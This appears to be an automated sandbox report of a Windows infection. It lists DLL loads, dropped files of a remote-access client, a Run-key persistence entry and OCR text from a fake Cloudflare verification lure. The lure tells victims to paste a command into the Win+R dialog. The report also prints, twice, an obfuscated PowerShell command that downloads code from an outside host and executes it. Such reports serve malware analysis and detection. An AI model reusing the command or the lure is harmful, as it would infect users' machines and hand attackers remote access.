Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: pcihooks.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Section loaded: fwpuclnt.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Roaming\HzYATQ\NSM.ini

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe

File opened: C:\Users\user\AppData\Roaming\HzYATQ\MSVCR100.dll

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X

Persistence and Installation Behavior

Detect drive by download via clipboard copy & paste

Source: screenshot	OCR Text: x e about:blank Just a moment.. webdemo.biz CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 2537" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare x Run Type the name of a program, folder, document or Internet resource and Windows will open it for you. Q pen: 0K 19:15 ENG p Type here to search SG 30/10/2024
Source: screenshot	OCR Text: x e about:blank Just a moment.. webdemo.biz CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 2537" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare x Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Open: 19:15 ENG p Type here to search SG 30/10/2024
Source: screenshot	OCR Text: x e about:blank Just a moment.. webdemo.biz CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 2537" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare 19:15 ENG p Type here to search SG 30/10/2024
Source: Chrome DOM: 1.1	OCR Text: CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. conn You will observe and agree: "Versify you are hutzri - Ray Verification 2577" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\HzYATQ\remcmdstub.exe	Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
